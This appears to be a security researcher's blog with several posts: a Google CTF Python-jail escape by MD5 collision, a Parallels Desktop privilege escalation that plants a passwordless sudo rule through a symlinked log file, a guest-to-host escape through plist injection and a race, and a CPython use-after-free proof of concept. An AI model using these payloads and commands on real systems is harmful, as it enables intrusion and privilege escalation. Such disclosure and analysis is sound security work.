pwn.win

Escaping a Python jail using an MD5 collision

2024-06-27T00:00:00+00:00

I played Google CTF last weekend and there was a fun Python jail challenge, PyCalc.

Connecting to the provided host and port gives us a limited Python shell. We can evaluate basic arithmetic expressions, like so:

$~ ncat pycalc.2024.ctfcompetition.com 1337
== proof-of-work: disabled ==
Simple calculator in Python, type 'exit' to exit
> 1+1
Caching code validation result with key d96e018f51ea61e5ff2f9c349c5da67d
Waiting up to 10s for completion
2

Most other expressions failed to execute, with the program detailing which opcode was disallowed. For example, attempting an import or calling a function:

== proof-of-work: disabled ==
Simple calculator in Python, type 'exit' to exit
> import os
Caching code validation result with key ed9f4b8f879ddbb59fda1057ea3a2810
Instruction IMPORT_NAME is not allowed
Code validation failed
> exec()
Caching code validation result with key c501db5e49896515e6d0ad52c2283bc2
Instruction PRECALL is not allowed
Code validation failed

It was clear that there was a whitelist of permitted opcodes. After searching for a while for ways to execute arbitrary code, we couldn’t find a method which didn’t fail the validation.

One particular line of the output was interesting though:

Caching code validation result with key d96e018f51ea61e5ff2f9c349c5da67d

The hash looks like MD5, and it sounds like the code is verifying the bytecode and then caching the result using this MD5 digest as the cache key. It’s quickly apparent that this hash is simply the MD5 of our UTF-8 encoded input.

hashlib.md5('1+1'.encode('utf8')).hexdigest() == 'd96e018f51ea61e5ff2f9c349c5da67d'

With this hypothesis we devised our solution: submit innocuous code which doesn’t contain bad opcodes, so that it is validated and the result cached, then submit evil code which has the same MD5 hash but contains bad opcodes, and which gets us a shell.
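To make the flaw concrete, here is a minimal sketch of a validator that caches its verdict under a hash of the input. The class and function names are hypothetical, and the real challenge checks opcodes rather than looking for a parenthesis. The demo at the bottom swaps MD5 for a deliberately weak key function so that a collision is trivial to produce.

```python
import hashlib


class ValidationCache:
    """Toy model of a validator that caches verdicts by a hash of the source."""

    def __init__(self, validate, key_fn=None):
        self.validate = validate
        # Assumption: the cache key is the MD5 of the UTF-8 encoded input.
        self.key_fn = key_fn or (
            lambda s: hashlib.md5(s.encode("utf8")).hexdigest()
        )
        self.verdicts = {}

    def is_allowed(self, source):
        key = self.key_fn(source)
        if key not in self.verdicts:      # cache miss: actually validate
            self.verdicts[key] = self.validate(source)
        return self.verdicts[key]         # cache hit: trust the old verdict


def no_calls(source):
    # Stand-in for the real opcode whitelist: reject anything with a call.
    return "(" not in source


# Demo with a weak key (first three characters) to simulate a collision.
weak_cache = ValidationCache(no_calls, key_fn=lambda s: s[:3])
benign_verdict = weak_cache.is_allowed("1+1")
evil_verdict = weak_cache.is_allowed("1+1 or breakpoint()")
```

Once the benign input has been validated, the evil input inherits its verdict because both map to the same key. With real MD5 the same thing happens for any colliding pair.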

So how do we create two Python expressions with the same hash which do different things?

The idea is this: start both inputs with an opening quote, ', then append arbitrary data to each such that the resulting strings have the same hash (i.e. create a collision). Then add an identical suffix to both strings. This preserves the collision, because MD5 processes its input block by block and the two colliding prefixes leave it in the same internal state. The suffix switches control flow based on the random data within the strings, for example:

'baR3SMhZPUl6zaL24n'[0] == 'b' or breakpoint()
'NzdYAKsD8AKK3z+la4'[0] == 'b' or breakpoint()

In the case of the first string the left-hand side of the or will be truthy and thus the expression will yield True. In the case of the second string the left-hand side will be falsy and therefore we will invoke breakpoint(), which in Python is sufficient to execute arbitrary code interactively.

In practice it was slightly more difficult, as we couldn’t use the equality operator, but we could use bitwise operators like &. We also couldn’t apply the bitwise operators to the result of indexing a string, as that is itself a string, but we could apply them to integers. Therefore we instead prefixed both inputs with b' to create bytestrings, which yield an integer when indexed. We could then combine these integers with bitwise operators to yield one truthy and one falsy value.

You may wonder why the bad opcodes on the right-hand side of the or aren’t included in the compiled code regardless - this is because when this code is compiled into bytecode Python omits the right-hand side if the left-hand side can be evaluated to a truthy value at compile time. You can see that here:

>>> import dis
>>> c = compile('1 or breakpoint()', '', 'eval')
>>> list(map(lambda x: x.opname, dis.get_instructions(c)))
['RESUME', 'LOAD_CONST', 'RETURN_VALUE']
>>> c = compile('0 or breakpoint()', '', 'eval')
>>> list(map(lambda x: x.opname, dis.get_instructions(c)))
['RESUME', 'PUSH_NULL', 'LOAD_NAME', 'CALL', 'RETURN_VALUE']

To generate the collision I used the textcoll.sh script from Marc Stevens’ HashClash. We modified the script slightly to increase the size of the alphabet, and remove the constraints on all but the first and second bytes (constraining them to b'). Generating this collision took around 30 minutes on a 128 core machine.

This resulted in two inputs:

# input1
b'cAWa,=tDo9lp4!tc&=A/-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg(

# input2
b'cAWa,=tDo9lp4!tc&=A3-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg(

Which we can see have the same MD5 hash:

$~ md5sum input*
102837a16831bc539fe06a9f21af30ad  input1
102837a16831bc539fe06a9f21af30ad  input2
$~ sha256sum input*
44ee9adeaf32bebda45eae0aa534a5574e209cd4f2b333005bbda638f3b76b2e  input1
dcaf5c2e1881d9b39c9190411dd000a52018043114c8196b4095867fdcf4a360  input2

Looking carefully, we can see that the 20th character (index 19) of the two bytestrings differs: in the first it is /, in the second it is 3. That means we can use this index to switch the control flow.

b'cAWa,=tDo9lp4!tc&=A/-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg(
                     ^
                     |--- 20th character of bytestring differs
                     v
b'cAWa,=tDo9lp4!tc&=A3-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg(

ANDing these characters with 4 results in a truthy value and a falsy value, which is exactly what we need.

>>> input1[19] & 4
4
>>> input2[19] & 4
0
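The search for a usable index and mask can be automated. The sketch below uses hypothetical helper names and only the first 28 bytes of the two colliding strings. It lists the positions where they differ and the single-bit masks that are truthy for the benign byte and falsy for the evil one.

```python
def differing_indices(a: bytes, b: bytes):
    """Indices at which two equal-length bytestrings differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


def selector_masks(benign_byte: int, evil_byte: int):
    """Single-bit masks that are truthy for benign_byte and falsy for evil_byte."""
    return [
        1 << bit
        for bit in range(8)
        if benign_byte & (1 << bit) and not evil_byte & (1 << bit)
    ]


# Prefixes of input1 and input2 from above (without the leading b').
benign = b"cAWa,=tDo9lp4!tc&=A/-.mkq38p"
evil = b"cAWa,=tDo9lp4!tc&=A3-.mkq38p"

diff = differing_indices(benign, evil)
masks = selector_masks(benign[diff[0]], evil[diff[0]])
```

Here '/' is 0x2f and '3' is 0x33, so bits 4 and 8 are set only in the benign byte. Either mask would work in the suffix.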

This gives us a common suffix which we can append to both payloads:

'[19] & 4 or breakpoint()

Now our final inputs look like this:

b'cAWa,=tDo9lp4!tc&=A/-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg('[19] & 4 or breakpoint()
b'cAWa,=tDo9lp4!tc&=A3-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg('[19] & 4 or breakpoint()

Submitting the benign input followed by the evil input invokes breakpoint() and we can use the Python debugger to drop us into a shell, like so:

$~ ncat pycalc.2024.ctfcompetition.com 1337
== proof-of-work: disabled ==
Simple calculator in Python, type 'exit' to exit
> b'cAWa,=tDo9lp4!tc&=A/-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg('[19] & 4 or breakpoint()
Caching code validation result with key 6418545ef8b9b1daa3b5fe41d46c2cc6
Waiting up to 10s for completion
4
> b'cAWa,=tDo9lp4!tc&=A3-.mkq38p_lMEWWA{e6v!2Rk:nL|N?;5d%`3F+{3,~Dk/ddEV+5qN"UUlv5a)W$R2pF9Rm|,tiD4-kA;s$V%^>]fi`(FX=q!!!!!&!!TQg('[19] & 4 or breakpoint()
Hit code validation result cache with key 6418545ef8b9b1daa3b5fe41d46c2cc6
Waiting up to 10s for completion
--Return--
> <string>(1)<module>()->None
(Pdb) import os; os.system('/bin/bash')
whoami
ubuntu
/readflag
CTF{Ca$4_f0r_d3_C4cH3_Ha5hC1a5h}

Turning a boring file move into a privilege escalation on Mac

2023-10-28T00:00:00+00:00

While poking around Parallels Desktop I found a script which is invoked by a setuid-root binary, which has the following snippet:

local prl_dir="${usr_home}/Library/Parallels"
if [ -e "$prl_dir" -a ! -d "$prl_dir" ]; then
  log warning "'${prl_dir}' is not a directory. Renaming it."
  mv -f "$prl_dir"{,~}
  continue
fi

Here ${usr_home} represents the home directory of the user for which Parallels Desktop is installed. The code says if ~/Library/Parallels exists and is not a directory then move it to ~/Library/Parallels~, presumably to back it up before creating this path as a directory.

However, given this is our home directory, we (a low-privileged user) can create ~/Library/Parallels~ beforehand and make it, for example, a symlink to another directory. The code would then actually move ~/Library/Parallels into the directory pointed to by the symlink. Additionally, we fully control the ~/Library/Parallels file: it can have whatever content we want, or it could even be a symlink to some other file.
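The behaviour is easy to reproduce in a scratch directory. This sketch uses Python's shutil.move as a stand-in for mv, since both move the source into the destination when the destination resolves to a directory. The directory names are made up, and privileged_dir stands in for a root-owned location.

```python
import os
import shutil
import tempfile


def demo_move_through_symlink():
    """Return where a file lands when the destination is a symlink to a directory."""
    with tempfile.TemporaryDirectory() as tmp:
        library = os.path.join(tmp, "Library")
        target_dir = os.path.join(tmp, "privileged_dir")  # hypothetical target
        os.makedirs(library)
        os.makedirs(target_dir)

        # The attacker-controlled file that the script wants to "back up".
        src = os.path.join(library, "Parallels")
        with open(src, "w") as f:
            f.write("attacker controlled\n")

        # Pre-create "Parallels~" as a symlink to the target directory.
        dst = os.path.join(library, "Parallels~")
        os.symlink(target_dir, dst)

        # Like mv, shutil.move moves *into* dst when dst resolves to a directory.
        shutil.move(src, dst)
        return os.listdir(target_dir), os.path.islink(dst)
```

The file ends up inside the symlink's target and the symlink itself is left untouched, which is the primitive the rest of the exploit builds on.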

Great, so now we can move a file of controlled content, or a symlink, into an arbitrary directory. How can we use this to escalate our privileges to root?

Digging around the filesystem, some ways which came to mind:

/etc/periodic/{daily,monthly,weekly}
- Files must be owned by root, which our file isn’t
- Besides, I don’t want to wait days for this privesc
/etc/pam.d/
- Files must be owned by root, which our file isn’t
- Filenames are important, we can’t use the Parallels filename for this
/etc/ssh/sshd_config.d/
- Could use something like AuthorizedKeysCommand and AuthorizedKeysCommandUser to execute a command as root
- Would need a reboot or some other way to force sshd to reload its config
- sshd would need to be running in the first place, which it’s not by default
/etc/sudoers.d/
- Files must be owned by root, which our file isn’t
- Files must not be world writeable

Of these, the hurdles which seemed easiest to overcome were those of /etc/sudoers.d. So I started digging for files which are owned by root, are not world-writeable, and we can partially control. With some searching I found /var/log/install.log.

-rw-r--r--@ 1 root  admin  637109 23 Jun 12:00 /var/log/install.log

It turns out we can write to this log using the logger utility, specifying the install.error priority. Like so:

logger -p install.error "Hello, World!"

Even better, we can get our content onto a new line using a carriage return, which is replaced with a newline, like so:

logger -p install.error $(echo -e "\rHello, World!")

We can use this to insert a line of sudo config:

logger -p install.error $(echo -e "\r$USER ALL=(ALL) NOPASSWD: ALL")

So now we have a log file with a bunch of invalid sudo config lines (i.e. normal log entries), with one line of valid sudo config, which says that our current user can use sudo with no password, allowing us to escalate our privileges.
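As a rough illustration of why the carriage return matters, the sketch below simulates the replacement described above. The function names and the log prefix are invented for the example, and the "\r" to "\n" rewrite is taken from the observation above rather than from any documented logging behaviour.

```python
def build_log_payload(user: str) -> str:
    # Leading carriage return, as in the logger command above.
    return f"\r{user} ALL=(ALL) NOPASSWD: ALL"


def simulate_log_entry(prefix: str, message: str) -> str:
    # Assumption: the logging pipeline rewrites "\r" to "\n", as observed above.
    return (prefix + message).replace("\r", "\n")


# Hypothetical log prefix, just to show that the rule lands on its own line.
entry = simulate_log_entry(
    "2023-06-23 12:00:00+01 host logger[123]: ",
    build_log_payload("alice"),
)
lines = entry.splitlines()
```

The timestamp prefix stays on the first line, and the second line is a clean sudo rule with nothing in front of it.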

Now we can make ~/Library/Parallels a symlink pointing to /var/log/install.log and ~/Library/Parallels~ a symlink pointing to /etc/sudoers.d/. When we invoke the vulnerable script, which runs as root, it will move our symlink, pointing to the log file, into /etc/sudoers.d/.

After that we can run sudo su, which will follow the symlink, parse the log file, spitting out pages of errors about the invalid syntax of the log entries in the process (but kindly continuing processing) until it reaches a line of valid syntax which we’ve injected, and eventually we’ll be dropped into a root shell.

Hopefully other people find this trick useful, beyond just Parallels. You can find the code for this exploit on my GitHub.

Timeline

2023-05-19 - ZDI submission, assigned ZDI-CAN-21227
2023-06-21 - reported to vendor
2023-07-06 - fix released in version 18.3.2
2023-12-19 - public release of advisory, CVE-2023-50226

Escaping Parallels Desktop with Plist Injection

2023-05-08T00:00:00+00:00

This post details two bugs I found, a plist injection (CVE-2023-27328) and a race condition (CVE-2023-27327), which could be used to escape from a guest Parallels Desktop virtual machine. In this post I’ll break down the findings.

For anyone not familiar, Parallels Desktop offers virtualization on macOS. It allows you to run virtual machines, like Windows or Linux, on a macOS host.

Toolgate & Parallels Tools

Toolgate is the protocol used for communication between the guest and host in Parallels, and it’s a great place to start looking for bugs due to its large attack surface and relatively immature security posture.

On x86 guests (which I’ll be using as an example for this blog post) Toolgate requests are sent to the host from the guest by writing the physical address of a TG_REQUEST struct to a specific I/O port.

A request structure consists of an opcode (Request), a status field (Status) which is updated by the host to indicate the status of a request, optional inline data (if InlineByteCount > 0), and an optional list of TG_BUFFER structs (if BufferCount > 0).

typedef struct _TG_REQUEST {
  unsigned Request;               // opcode
  unsigned Status;                // request status
  unsigned short InlineByteCount; // number of inline bytes
  unsigned short BufferCount;     // number of buffers
  unsigned Reserved;              // reserved
  /* [ inline bytes ] */
  /* [  TG_BUFFERs  ] */
} TG_REQUEST;
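For experimenting with the layout, the header can be modelled with Python's struct module. This is a sketch which assumes a little-endian x86 guest, 32-bit unsigned fields and no padding. The helper name is hypothetical, and the Status value of 0 is only a placeholder.

```python
import struct

# Request, Status, InlineByteCount, BufferCount, Reserved (little-endian).
TG_REQUEST_HEADER = struct.Struct("<IIHHI")


def pack_tg_request(opcode: int, inline: bytes = b"", buffer_count: int = 0) -> bytes:
    """Pack a TG_REQUEST header followed by its inline bytes.

    TG_BUFFER entries are not modelled here; buffer_count is only recorded.
    """
    header = TG_REQUEST_HEADER.pack(
        opcode,        # Request
        0,             # Status (placeholder, updated by the host)
        len(inline),   # InlineByteCount
        buffer_count,  # BufferCount
        0,             # Reserved
    )
    return header + inline


request = pack_tg_request(0x8302, inline=b"\x01\x02\x03\x04")
```

The fixed part of the structure comes out at 16 bytes, with any inline data immediately after it.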

Parallels Tools is software which can be installed in a guest (similar to VirtualBox Guest Additions, or VMware Tools) which adds various useful features, such as shared folders, shared clipboard, and drag-and-drop in/out of the VM.

Parallels Tools also adds a channel for userland processes to make Toolgate requests. On Linux this is a proc entry created at /proc/driver/prl_tg, which is created and managed by the prl_tg kernel module, and on Windows this is a named pipe at \\.\pipe\parallels_tools_pipe. Parallels Tools also contains various userland processes and services which use this channel to facilitate these useful features.

Importantly there is a restriction on what Toolgate messages userland processes can send to the host using the channel created by Parallels Tools, which is enforced by the prl_tg kernel module. Specifically, the opcode (aka the Request field) must be greater than the value of TG_REQUEST_SECURED_MAX, which is defined as 0x7fff, otherwise the write to the proc entry will fail with EINVAL. We can see the code for this here:

	/* read request header from userspace */
	if (copy_from_user(src, ureq, sizeof(TG_REQUEST)))
		return -EFAULT;

	/*
	 * requests up to TG_REQUEST_SECURED_MAX are for drivers only and are
	 * denied by guest driver if come from user space to maintain guest
	 * kernel integrity (prevent malicious code from sending FS requests)
	 * dynamically assigned requests start from TG_REQUEST_MIN_DYNAMIC
	 */
	if (src->Request <= TG_REQUEST_SECURED_MAX)
		return -EINVAL;

As suggested by the comment, the only Toolgate opcodes which are less than this threshold are those which handle filesystem operations. This means that if we want to send filesystem-related Toolgate requests, we have to bypass this check. More on this later.
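The check is simple enough to mirror in a few lines. The sketch below is a Python model of the kernel snippet above, not the driver code itself. It is applied to the two opcodes that appear later in this post: 0x8302 (TG_REQUEST_FAVRUNAPPS) and 0x223 (TG_REQUEST_FS_L_OPEN).

```python
import errno

TG_REQUEST_SECURED_MAX = 0x7FFF


def check_userspace_request(opcode: int) -> int:
    """Model of the prl_tg check: 0 if allowed from userland, -EINVAL otherwise."""
    if opcode <= TG_REQUEST_SECURED_MAX:
        return -errno.EINVAL
    return 0


favrunapps_result = check_userspace_request(0x8302)  # shared applications
fs_open_result = check_userspace_request(0x223)      # filesystem open
```

The shared applications opcode passes, while the filesystem opcode is rejected, which is why the file write bug later needs a custom kernel module.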

Shared Applications

Shared Applications is a Parallels feature which allows opening files on a Mac in a guest application, and vice versa. It also allows associating file extensions and URL schemes with guest applications. You can read more about this in the documentation.

This feature includes the display of an application’s icon in the Mac dock when it’s launched within a guest. Here’s an example of what it looks like when Microsoft Edge is opened in a Windows guest. We can see that the Edge icon shows up in the dock:

Parallels handles the “syncing” of running guest apps to the host by monitoring for new applications launched in the guest, and then sending Toolgate requests to the host when a new application has started. The host handles these messages by creating and starting “helper” apps, which have the same name and icon as the app in the guest. These helper apps are then displayed in the Mac dock when they are running, and can be used to launch the respective application in the guest from the dock or Launchpad when they are not running.

This syncing process effectively works like this:

1. Parallels Tools detects an application is launched in the guest
2. It sends a Toolgate request (TG_REQUEST_FAVRUNAPPS, opcode 0x8302) to the host notifying it that an application has launched with a given name and icon
3. If a helper app already exists for this guest app, then that helper app is launched and we’re done
4. If the helper app doesn’t exist, a new app bundle is created in ~/Applications (Parallels)/ Applications.localized/
5. The app bundle is created from a template, which is filled in using information supplied by the guest. The information sent from the guest, as part of the Toolgate request, includes the app name, description and icon, amongst other things. This information is written into several files in the new app bundle, including the Info.plist, which is the (XML) file in an app bundle which includes metadata about the bundle
6. The new helper app is launched, so it shows up in the dock

The helper app contains a binary called WinAppHelper, which is copied directly from the template and exists as the entry point for the app bundle. When the app is run this binary will parse the Parallels-specific configuration files in the app bundle (e.g. AppParams.pva) and send a message to the corresponding guest VM to start the relevant application, if it’s not already running.

Here you can see a snippet of the Info.plist template, which is taken from the hypervisor binary. The highlighted placeholders are replaced with guest supplied input.

Given that the host is taking input from the guest and using it to fill an Info.plist template, it is important that all input from the guest is appropriately escaped or sanitized, so it is not possible to inject XML into the plist and modify the behaviour of the helper app. I found that the escaping was done for all of the fields provided by the guest, apart from two, the URL schemes and the file extensions. These allow registering file extensions and URL schemes which the guest app will handle, respectively.

This means we could send our own Toolgate request (opcode 0x8302), to tell the host to create a helper app, with a malicious URL scheme or file extension. In my case I chose to exploit the URL schemes, which were written unescaped into the CFBundleURLSchemes array, in Info.plist.

The relevant template for creating the CFBundleURLSchemes array looks like this:

<key>CFBundleURLTypes</key>
<array>
  <dict>
    <key>CFBundleURLName</key>
    <string>Supported protocols</string>
    <key>CFBundleURLSchemes</key>
    <array>
    %1
    </array>
  </dict>
</array>

The %1 is replaced with the guest-provided URL schemes, each wrapped in <string> tags. The completed template is then inserted into the Info.plist template later on.

This is what it looks like in code form:

One way this can be abused is by using the LSEnvironment key to set the DYLD_INSERT_LIBRARIES environment variable. This can be used to force the helper binary (WinAppHelper) to load an arbitrary dylib when executed. I did spend a while looking for other features of an Info.plist which I could exploit without requiring a second bug, but I wasn’t able to find anything better. I’d be very keen to hear any alternative ideas for exploitation.

For example, if we provide the following string as a URL scheme:

      evil
    
LSEnvironment

  DYLD_INSERT_LIBRARIES
  /path/to/malicious.dylib

blabla

This gets wrapped in <string> tags and inserted into the template, resulting in something like this:

CFBundleURLTypes

    CFBundleURLName
    Supported protocols
    CFBundleURLSchemes
    
      evil
    
LSEnvironment

  DYLD_INSERT_LIBRARIES
  /path/to/malicious.dylib

blabla

Now when WinAppHelper is executed it will load a dylib of our choice. If we can make use of an existing dylib which does something interesting, or create our own dylib on disk somewhere, then we can use this to get code execution on the host.
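The injection can be reproduced offline with Python's plistlib. The following is a sketch under several assumptions: the template is a cut-down plist I wrote for the example rather than the one in the hypervisor, the fill function is hypothetical, and the tail of the payload (everything after the LSEnvironment dict) is my own choice for re-opening the elements that the template goes on to close.

```python
import plistlib
from xml.sax.saxutils import escape

# Minimal stand-in for the real Info.plist template.
TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>CFBundleURLTypes</key>
  <array>
    <dict>
      <key>CFBundleURLName</key>
      <string>Supported protocols</string>
      <key>CFBundleURLSchemes</key>
      <array>
        %1
      </array>
    </dict>
  </array>
</dict>
</plist>
"""

PAYLOAD = (
    # Close the string, the schemes array, the dict and the types array.
    "evil</string></array></dict></array>"
    # Inject a new top-level key.
    "<key>LSEnvironment</key>"
    "<dict><key>DYLD_INSERT_LIBRARIES</key>"
    "<string>/path/to/malicious.dylib</string></dict>"
    # Re-open the structures that the rest of the template will close.
    "<key>blabla</key><array><dict><key>blabla</key><array><string>blabla"
)


def fill(schemes, escape_input):
    """Fill the template with URL schemes, optionally XML-escaping them."""
    items = "".join(
        "<string>%s</string>" % (escape(s) if escape_input else s)
        for s in schemes
    )
    return plistlib.loads(TEMPLATE.replace("%1", items).encode("utf-8"))


unsafe = fill([PAYLOAD], escape_input=False)
safe = fill([PAYLOAD], escape_input=True)
```

Without escaping, the parsed plist gains a top-level LSEnvironment dictionary. With escaping, the whole payload stays a single, harmless URL scheme string.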

Getting a File Write

To complete the goal of code execution on the host with no user interaction, I needed to find a way to write a controlled dylib to a known location on the host. Unfortunately there were no files in the helper app bundle which I controlled in their entirety (including e.g. the app icon). Shared folders seemed like a good place to look for bugs which could allow us to do this.

Shared folders in Parallels are actually implemented using Toolgate, which has opcodes for all aspects of file management, including opening, reading and writing files. The shared folder filesystem kernel module (prl_fs), writes the relevant Toolgate instructions to the host when filesystem operations occur in the guest, and the host then performs the requested operation.

As mentioned earlier, all of these opcodes are forbidden by the communication channel created by Parallels Tools, which means to send filesystem-related opcodes we need to load our own kernel module to do this, which unfortunately requires root permissions. To do this I took the existing prl_tg code and made some modifications to remove the security checks.

Once we can write arbitrary messages to Toolgate, we can open files in a shared folder using the TG_REQUEST_FS_L_OPEN (0x223) opcode. In the hypervisor, file paths are constructed by appending the file path provided by the guest to the configured shared folder path on the host. There are some security checks when handling an open request to make sure the guest can’t open files outside of the host shared folder path, including:

Checking if the file path contains .., which should have already been canonicalized by the guest
Checking if the file is a symlink which points outside of the share
Opening the constructed path and checking if the resulting file is outside of the shared folder on the host, which is done using the F_GETPATH option of fcntl.

If any of these checks fail then Parallels will refuse to open the file and will return an error to the guest. The checks themselves look good, but the issue was a time-of-check to time-of-use (TOCTOU) opportunity between when the security checks happened and when the file was actually opened. This meant that if we quickly switched the path from a normal file to a symlink pointing to a path outside of the share on the host, after the security checks, but before the open, then the hypervisor would open the target of the symlink on the host for us. After that we could simply read from or write to the opened file using subsequent calls to Toolgate. In other words, this gives us the ability to read or write any file on the host, assuming the host process has permissions.
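The pattern is easier to see in a small model. The sketch below is not the Parallels code: it is a hypothetical check-then-open function in Python, with a callback that runs between the check and the open so that the race can be triggered deterministically.

```python
import os
import tempfile


def vulnerable_open(share_root, rel_path, between_check_and_use=lambda: None):
    path = os.path.join(share_root, rel_path)
    # Time of check: resolve symlinks and require the result to stay in the share.
    root = os.path.realpath(share_root)
    resolved = os.path.realpath(path)
    if os.path.commonpath([resolved, root]) != root:
        raise PermissionError("path escapes the shared folder")
    between_check_and_use()  # window in which the guest can swap the file
    # Time of use: the path is resolved a second time here.
    with open(path) as f:
        return f.read()


def demo_race():
    with tempfile.TemporaryDirectory() as tmp:
        share = os.path.join(tmp, "share")
        os.makedirs(share)
        secret = os.path.join(tmp, "host_secret.txt")  # outside the share
        with open(secret, "w") as f:
            f.write("host only")
        victim = os.path.join(share, "file.txt")
        with open(victim, "w") as f:
            f.write("benign")

        def swap():
            # Replace the regular file with a symlink pointing out of the share.
            os.remove(victim)
            os.symlink(secret, victim)

        return vulnerable_open(share, "file.txt", swap)
```

The check sees a regular file inside the share, but the open follows the symlink that replaced it. A more robust design opens the file first and then validates the resulting file descriptor, so that the check and the use refer to the same object.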

Ok, but why do we need Toolgate requests for this, if the shared folders filesystem does it for us? In theory this bug should be exploitable by just performing the race with files in a shared folder, without sending manual Toolgate requests. However, in practice, trying to exploit this race through only filesystem operations triggers a bug in the prl_fs kernel module which results in a kernel oops.

Combining the two

The first bug allows us to load any dylib on the host, and the second bug gives us the ability to write an arbitrary file anywhere on the host filesystem (assuming the Parallels process has permissions). Therefore we can create a malicious dylib, write it to a known location on the host, and force a helper app to load it, which will give us code execution with no user interaction.

We can use the following code compiled into a dylib, which will pop a calculator when the dylib is loaded.

#include <stdlib.h>

void __attribute__ ((constructor)) pwn() {
    unsetenv("DYLD_INSERT_LIBRARIES");
    system("osascript -e 'tell application \"Calculator.app\" to activate'");
}

Exploit Demonstration

Conclusion

This chain can be exploited from within any guest operating system by any code with elevated privileges, which are necessary to use the privileged instructions needed to write arbitrary Toolgate requests. If Parallels Tools is installed, then the plist injection bug can be exploited with low privileges, but the file write bug still requires loading our own kernel module to bypass the security restrictions and send our own filesystem-related Toolgate requests.

Overall, Parallels is a fun target. Based on the bugs I and others have found I would say that it’s more immature than the likes of VirtualBox and VMware, and I’m sure there are plenty more bugs to be found here.

You can find the code for these exploits on my GitHub.

Timeline

Plist injection
- Assigned CVE-2023-27328 / ZDI-23-220
- 2022-11-03 - reported to vendor
- 2022-12-13 - fix released in version 18.1.1
- 2023-03-07 - public release of advisory
File open TOCTOU
- Assigned CVE-2023-27327 / ZDI-23-215
- 2022-11-03 - reported to vendor
- 2022-12-13 - fix released in version 18.1.1
- 2023-03-07 - public release of advisory

Exploiting a Use-After-Free for code execution in every version of Python 3

2022-05-11T00:00:00+00:00

A while ago I was browsing the Python bug tracker, and I stumbled upon this bug - “memoryview to freed memory can cause segfault”. It was created in 2012, originally present in Python 2.7, but remains open to this day, 10 years later. This piqued my interest, so I decided to take a closer look.

What follows is a breakdown of the root cause and how I wrote a reliable exploit which works in every version of Python 3.

Python Objects

To understand anything happening in CPython it’s important to have an understanding of how objects are represented internally. I’ll give a brief introduction here, but there are several (better) resources on the internet for learning about this.

Everything in Python is an object. CPython represents these objects with the PyObject struct. Every type of object extends the basic PyObject struct with their own specific fields. A PyObject looks like this:

typedef struct _object {
    Py_ssize_t ob_refcnt;
    PyTypeObject *ob_type;
} PyObject;

A list, for example, is represented by a PyListObject, which looks roughly like this:

typedef struct {
    PyObject ob_base;
    Py_ssize_t ob_size;
    PyObject **ob_item;
    Py_ssize_t allocated;
} PyListObject;

We can see that every object has a refcount (ob_refcnt) and a pointer to its corresponding type object (ob_type), in ob_base. The type object is a singleton and there exists one for every type in the Python language. For example, an int will point to PyLong_Type, and a list will point to PyList_Type.
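You can peek at these two header fields from Python itself using ctypes. This is a small sketch which assumes a default (non free-threaded, non-debug) CPython build, where id() returns the object's address and ob_type immediately follows ob_refcnt. The helper name is made up.

```python
import ctypes


def read_object_header(obj):
    """Read ob_refcnt and ob_type straight out of an object's memory."""
    addr = id(obj)  # in CPython, id() is the address of the PyObject
    refcnt = ctypes.c_ssize_t.from_address(addr).value
    type_ptr = ctypes.c_void_p.from_address(
        addr + ctypes.sizeof(ctypes.c_ssize_t)
    ).value
    return refcnt, type_ptr


sample = [1, 2, 3]
refcnt, type_ptr = read_object_header(sample)
```

The second field comes back as the address of the list type object, i.e. id(list), which is PyList_Type in C.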

With that out of the way, let’s look at the PoC.

Proof of Concept

The author of the bug report kindly included a proof of concept which will trigger a null pointer dereference. You can see that here:

import io

class File(io.RawIOBase):
    def readinto(self, buf):
        global view
        view = buf
    def readable(self):
        return True
    
f = io.BufferedReader(File())
f.read(1)                       # get view of buffer used by BufferedReader
del f                           # deallocate buffer
view = view.cast('P')
L = [None] * len(view)          # create list whose array has same size
                                # (this will probably coincide with view)
view[0] = 0                     # overwrite first item with NULL
print(L[0])                     # segfault: dereferencing NULL

Root Cause

The comments in the PoC provide some indication as to what is going on, but I’ll try to break it down further.

This bug is a fairly typical use-after-free, but to understand it we must first understand what io.BufferedReader does. The documentation does a good job of explaining it:

A buffered binary stream providing higher-level access to a readable, non seekable RawIOBase raw binary stream. It inherits BufferedIOBase.

When reading data from [the BufferedReader], a larger amount of data may be requested from the underlying raw stream, and kept in an internal buffer. The buffered data can then be returned directly on subsequent reads.

In the proof of concept we first define a class called File, which inherits from io.RawIOBase, and define some methods on it. We then create a BufferedReader object, specifying an instance of the custom File class as the underlying raw stream.

When the BufferedReader is initialized it allocates an internal buffer. When we read from the buffered reader (line 11) and the data doesn’t exist in its internal buffer, it will read from the underlying stream. The read from the underlying stream happens via the readinto function, which receives a buffer as an argument, which the raw stream is supposed to read data into. The buffer passed as an argument is actually a memoryview which is backed by the BufferedReader’s internal buffer. You can think of the memoryview as a pointer to, or a view of, the internal buffer.

Given that we control the underlying stream object, we can make the readinto function save a reference to this memoryview argument, which will persist even once we’ve returned from the function, which is exactly what the PoC does on line 6.

